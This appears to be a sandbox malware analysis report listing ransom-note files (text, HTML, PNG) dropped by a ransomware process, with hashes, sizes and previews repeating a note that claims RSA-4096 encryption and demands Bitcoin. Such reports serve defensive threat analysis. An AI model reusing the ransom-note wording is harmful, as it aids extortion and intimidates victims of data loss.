                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
